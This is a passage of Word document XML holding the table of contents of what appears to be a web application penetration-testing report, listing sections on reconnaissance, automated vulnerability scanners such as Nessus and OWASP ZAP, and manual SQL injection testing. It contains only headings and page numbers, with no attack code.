            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Profiling Web Architecture Infrastructure &amp; Technology Used</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100219 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C927125" w14:textId="1174E6E5"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20" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.2</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Operating System &amp; Services</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100220 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="190B8F0E" w14:textId="53DB55D4"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21" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.3</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mapping of Directories &amp; Resources</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100221 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B7BD43D" w14:textId="0552A23B" w:rsidR="00FF7D56" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="440"/>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc94100222" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vulnerability Scanning</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100222 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="088A254B" w14:textId="41AB68B9"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23" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Automated Testing</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100223 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36C56EE9" w14:textId="15EFD3CB"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24" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.1</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Nessus</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100224 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F3CB11E" w14:textId="50304000"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25" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.2</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Nexpose</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100225 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6663A8E2" w14:textId="16442582"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26" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.3</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SkipFish</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100226 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1852CFE7" w14:textId="2EF72B4D"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27" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.4</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OWASP ZAP (Active Scan)</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100227 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3BFE96AD" w14:textId="18151B99"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28" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.5</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSSSniper</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100228 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="30E748CF" w14:textId="7D1A8DDB"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29" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.6</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Wapiti</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100229 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33E0FE7F" w14:textId="77AF0BB8"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30" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.7</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OWASP ZAP (XSS Fuzzer)</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100230 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59902B0C" w14:textId="573F8F73"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31" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Manual Testing</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100231 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AD04E32" w14:textId="65E65B04"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32" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.1</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQL Injection Vulnerability</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100232 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="745477AD" w14:textId="664FA033"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33" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.2</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
